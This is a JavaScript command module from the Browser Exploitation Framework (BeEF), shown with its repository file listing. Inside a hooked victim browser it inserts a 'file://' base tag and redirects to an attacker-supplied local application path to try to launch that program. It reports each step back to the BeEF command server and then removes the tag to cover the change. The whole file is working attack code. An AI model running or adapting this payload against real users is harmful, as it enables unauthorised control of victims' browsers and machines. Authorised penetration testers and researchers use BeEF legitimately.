15 lines
748 B
JavaScript
Executable File
15 lines
748 B
JavaScript
Executable File
//
|
|
// Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function() {
|
|
var baseTag = document.createElement('base');
|
|
baseTag.setAttribute('id', 'sla_<%= @command_id %>');
|
|
baseTag.setAttribute('href', 'file://');
|
|
document.head.appendChild(baseTag);
|
|
setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000);
|
|
setTimeout('document.head.removeChild(document.getElementById("sla_<%= @command_id %>"));beef.net.send("<%= @command_url %>", <%= @command_id %>, "Base tag removed");', 1000);
|
|
});
|